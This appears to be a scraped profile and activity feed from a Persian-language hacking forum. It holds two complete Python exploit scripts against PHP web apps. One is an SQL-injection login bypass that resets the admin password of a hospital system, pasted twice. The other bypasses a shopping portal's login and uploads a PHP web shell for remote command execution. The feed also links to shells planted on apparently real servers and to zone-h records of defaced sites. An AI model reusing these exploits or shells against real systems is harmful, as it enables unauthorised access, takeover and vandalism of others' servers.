.png.48b3f4ee75d54b9b94cd5a5b16ff2c53.png)
proxy
-
تعداد ارسال ها
769 -
تاریخ عضویت
-
آخرین بازدید
-
روز های برد
98
درباره proxy
- تاریخ تولد ۹ آذر ۱۳۷۸
دستاورد های proxy
-
proxy به یک ارسال در یک موضوع واکنش نشان داد :
Image Compressor GUI
-
proxy به یک ارسال در یک موضوع واکنش نشان داد :
ماجرای هک شدن آنتن صداوسیما + ویدیو
-
proxy به یک ارسال در یک موضوع واکنش نشان داد :
چند ویروس ساده سی پلاس (سطح بگی نگی مبتدی)
-
proxy به یک ارسال در یک موضوع واکنش نشان داد :
آموزش استفاده از argparse
-
proxy به یک ارسال در یک موضوع واکنش نشان داد :
برخورد با یک ارور توی کد نویسی سی شارپ
-
proxy به یک ارسال در یک موضوع واکنش نشان داد :
اجرای Vege
-
proxy به یک ارسال در یک موضوع واکنش نشان داد :
Text Exteractor from PDF
-
proxy به یک ارسال در یک موضوع واکنش نشان داد :
encrypt & decrypt PDF File
-
proxy به یک ارسال در یک موضوع واکنش نشان داد :
تشخیص دهنده ماشین مجازی ساز(برای ....)
-
proxy به یک ارسال در یک موضوع واکنش نشان داد :
دوره جامع Sans 642
-
Bl4ckw0rM به یک ارسال در یک موضوع واکنش نشان داد :
اجرا نشدن کد C CPP در Vs code
-
RT3N به یک ارسال در یک موضوع واکنش نشان داد :
اجرا نشدن کد C CPP در Vs code
-
R3XCR4PY به یک ارسال در یک موضوع واکنش نشان داد :
اجرا نشدن کد C CPP در Vs code
-
johnjones به یک ارسال در یک موضوع واکنش نشان داد :
سوالات مبتدی
-
MR.wIzArD به یک ارسال در یک موضوع واکنش نشان داد :
اجرا نشدن کد C CPP در Vs code
-
اجرا نشدن کد C CPP در Vs code
XxMaHdIxX پاسخی برای موضوع ارسال کرد در proxy : سوال و جواب های برنامه نویسی
باید هر زبانی رو که دارین مینویسید کامپایارش رو نصب کنید و انتخابش کنید کنار همون قسمت که دکمه ران هست کامپایلر هم هست اونو چک کنید- 7 پاسخ
-
- 4
-
-
نیاز به شل فوری
mr.0 پاسخی برای موضوع ارسال کرد در proxy : سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
بخش vip برای همین ساخته شده دوست عزیز https://www.prnsscollege.ac.in/new.php- 1 پاسخ
-
- 3
-
-
Hospital Management System 4.0 - Authentication Bypass
یک موضوع پاسخی ارسال کرد برای proxy در باگ های امنیتی
# Exploit Title: Hospital Management System 4.0 - Authentication Bypass # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/hospital-management-system-in-php/ # Version: v4.0 # Category: Webapps # Tested on: Xampp for Windows # Description: # Password and username parameters have sql injection vulnerability on admin panel. # username: joke' or '1'='1 , password: joke' or '1'='1 # Exploit changes password of admin user. #!/usr/bin/python import requests import sys if (len(sys.argv) !=2) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath" print "[*] e.g.: PoC.py 127.0.0.1/hospital" exit(0) rhost = sys.argv[1] npasswd = str(raw_input("Please enter at least six characters for new password: ")) url = "http://"+rhost+"/hms/admin/index.php" data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""} #login with requests.Session() as session: lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) #check authentication bypass check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False) print ("[*] Status code: %s"%check.status_code) if check.status_code == 200: print "[+] Authentication bypass was successful!" print "[+] Trying to change password." elif check.status_code == 404: print "[-] One bad day! Check target web application path." sys.exit() else: print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually." sys.exit() #change password cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""} cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"}) if cgpasswd.status_code == 200: print ("[+] Username is: admin") print ("[+] New password is: %s"%npasswd) else: print "[-] One bad day! Try it manually." sys.exit() hospital_poc.py #!/usr/bin/python import requests import sys if (len(sys.argv) !=2) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath" print "[*] e.g.: PoC.py 127.0.0.1/hospital" exit(0) rhost = sys.argv[1] npasswd = str(raw_input("Please enter at least six characters for new password: ")) url = "http://"+rhost+"/hms/admin/index.php" data = {"username": "joke' or '1'='1", "password": "joke' or '1'='1", "submit": "", "submit": ""} #login with requests.Session() as session: lpost = session.post(url=url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) #check authentication bypass check = session.get("http://"+rhost+"/hms/admin/dashboard.php", allow_redirects=False) print ("[*] Status code: %s"%check.status_code) if check.status_code == 200: print "[+] Authentication bypass was successful!" print "[+] Trying to change password." elif check.status_code == 404: print "[-] One bad day! Check target web application path." sys.exit() else: print "[-] One bad day! Authentication bypass was unsuccessful! Try it manually." sys.exit() #change password cgdata = {"cpass": "joke' or '1'='1", "npass": ""+npasswd+"", "cfpass": ""+npasswd+"","submit":""} cgpasswd = session.post("http://"+rhost+"/hms/admin/change-password.php", data=cgdata, headers = {"Content-Type": "application/x-www-form-urlencoded"}) if cgpasswd.status_code == 200: print ("[+] Username is: admin") print ("[+] New password is: %s"%npasswd) else: print "[-] One bad day! Try it manually." sys.exit() -
# Exploit Title: Shopping Portal ProVersion 3.0 # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/shopping-portal-free-download/ # Version: v4.0 # Category: Webapps # Tested on: Xampp for Windows # Description: # Password and username parameters have sql injection vulnerability on admin panel. # username: joke' or '1'='1'# , password: joke' or '1'='1'# # Also, there isn't any restriction for malicious file uploading in the "Insert Product" section. # This two vulnerabilities occur unauthenticated remote command execution. #!/usr/bin/python import requests import sys import urllib if (len(sys.argv) !=3) or sys.argv[1] == "-h": print "[*] Usage: PoC.py rhost/rpath command" print "[*] e.g.: PoC.py 127.0.0.1/shopping ipconfig" exit(0) rhost = sys.argv[1] command = sys.argv[2] url = "http://"+rhost+"/admin/index.php" data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""} with requests.Session() as session: #login lg = login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) print ("[*] Status code for login: %s"%lg.status_code) if lg.status_code != 200: print ("One bad day! Check web application path!") sys.exit() #upload file files = {'productimage1': ('command.php', '<?php system($_GET["cmd"]); ?>'), 'productimage2': ('joke.txt', 'joke'), 'productimage3': ('joke.txt', 'joke')} fdata = {"category": "3", "subcategory": "8", "productName": "the killing joke", "productCompany": "blah", "productpricebd": "0", "productprice": "0", "productDescription": "blah<br>", "productShippingcharge": "0", "productAvailability": "In Stock", "productimage1": "command.php", "productimage2": "joke.txt", "productimage3": "joke.txt", "submit": ""} furl = "http://"+rhost+"/admin/insert-product.php" fupload = session.post(url=furl, files=files, data=fdata) print ("[*] Status code for file uploading: %s"%fupload.status_code) if fupload.status_code != 200: print ("One bad day! File didn't upload.") sys.exit() dir = 0 dirr = str(dir) #find uploaded file while True: el = eurl = session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php") if el.status_code == 200: print "File Found!" print "Put On A Happy Face!\r\n\r\n" print ("uploaded file location: http://%s/admin/prductimages/%s/command.php?id=%s"%(rhost,dirr,command)) break else: print "trying to find uploaded file..." dir += 1 dirr = str(dir) #exec final=session.get("http://"+rhost+"/admin/productimages/"+dirr+"/command.php?cmd="+command) print final.text
-
- 3
-
-
- bypass page admin
- بایپس پیج ادمین
- (و 5 مورد دیگر)
-
تبدیل کردن کامپیوتر شخصی به سرور
pro_lion پاسخی برای موضوع ارسال کرد در proxy : سوال و جواب های شبکه
دقیقا چی میخواین بالا بیاریین؟- 5 پاسخ
-
- 1
-
-
hashidentifier احتمالا خیلی زیاد اینه Woltlab Burning Board 4.x تا اونجایی که من نگاه کردم بهش BB4 میگن
- 1 پاسخ
-
- 3
-
-
سایتهای هک شده توسط تیم امنیتی گارد ایران - Guardiran Security Team
kingdeface پاسخی برای موضوع ارسال کرد در proxy : قوانین و اطلاعیه های سایت
با سلام دوست عزیز اول باید سایت رو در zone-h ثبت کنی بعد لینک ثبت رو قرار بدی http://www.zone-h.org/notify/single -
سایتهای هک شده توسط تیم امنیتی گارد ایران - Guardiran Security Team
kingdeface پاسخی برای موضوع ارسال کرد در proxy : قوانین و اطلاعیه های سایت
http://www.zone-h.org/mirror/id/38952057- 1,206 پاسخ
-
- 8
-
-
-
- تیم امنیتی گارد ایران
- نفوذ به سایتها
- (و 4 مورد دیگر)
-
http://scaw.jktech.com.sg:3000/scaw/user0/wtop.asp
- 182 پاسخ
-
- 4
-
-
- شل های آماده جهت تمرین
- استفاده از شل
- (و 8 مورد دیگر)
-
سایتهای هک شده توسط تیم امنیتی گارد ایران - Guardiran Security Team
kingdeface پاسخی برای موضوع ارسال کرد در proxy : قوانین و اطلاعیه های سایت
http://www.zone-h.org/mirror/id/38946820- 1,206 پاسخ
-
- 6
-
-
- تیم امنیتی گارد ایران
- نفوذ به سایتها
- (و 4 مورد دیگر)
-
سوال و جوابهای عمومی کالی لینوکس
proxy پاسخی برای موضوع ارسال کرد در proxy : سوال و جواب های سیستم عامل ها
اول جستجو کنید آموزشهای زیادی در انجمن هست که میتونید استفاده کنید https://www.google.com/search?q=site%3Aguardiran.org+%D8%A7%D8%B6%D8%A7%D9%81%D9%87+%DA%A9%D8%B1%D8%AF%D9%86+%D9%81%D8%A7%D8%B1%D8%B3%DB%8C+%D8%A8%D9%87+%DA%A9%D8%A7%D9%84%DB%8C&oq=site%3Aguardiran.org+%D8%A7%D8%B6%D8%A7%D9%81%D9%87+%DA%A9%D8%B1%D8%AF%D9%86+%D9%81%D8%A7%D8%B1%D8%B3%DB%8C+%D8%A8%D9%87+%DA%A9%D8%A7%D9%84%DB%8C&aqs=chrome..69i57j69i58.22041j0j7&sourceid=chrome&ie=UTF-8- 63 پاسخ
-
- 1
-
-
- سوالات توزیع های مختلف لینوکس
- مشکلات مربوط به توزیع های لینوکس
- (و 16 مورد دیگر)
-
دکمه fn رو بگیر بعد دکمه insert num lk رو بزن ببین درست میشه
-
تبدیل بسته های pcap به csv.mp4
-
- 4
-
-
- تبدیل فایلهای شبکه به اکسل
- تبدیل فایلهای شبکه به اکس
- (و 10 مورد دیگر)
-
iot.mp4
-
- 8
-
-
-
- hack
- machine learning
- (و 9 مورد دیگر)
-
چطور میشه با یه هاست به بقیه هاست ها دسترسی گرفت
NullBoy پاسخی برای موضوع ارسال کرد در proxy : سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
لینک سرور دیسکورد https://discord.gg/J2kqHMTZ- 7 پاسخ
-
- 4
-
-
